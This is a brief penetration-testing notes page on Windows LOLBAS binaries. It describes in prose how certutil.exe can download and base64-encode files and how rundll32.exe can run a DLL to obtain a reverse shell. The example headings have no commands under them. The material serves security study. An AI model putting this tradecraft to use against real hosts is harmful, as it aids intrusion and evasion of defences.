Windows binaries - LOLBAS
Equivalent to suid binaries from linux in Windows would be: LOLBAS: https://lolbas-project.github.io/ (Living Off The Land Binaries, Scripts and Libraries),
Each of these binaries, scripts and libraries is a Microsoft-signed file that is either native to the operating system or can be downloaded directly from Microsoft and have unexpected functionality useful to an attacker.
Transferring File with Certutil
One classic example is certutil.exe, whose intended use is for handling certificates but can also be used to transfer files by either downloading a file to disk or base64 encoding/decoding a file.
Import a file (type from your windows target host):
Encode to base64:
Decode a file:
Execute a DLL file with rundll32.exe
A binary such as rundll32.exe can be used to execute a DLL file.
We could use this to obtain a reverse shell by executing a .DLL file that we either download onto the remote host or host ourselves on an SMB share.
Last update: 2025-05-18 Created: May 23, 2023 19:56:20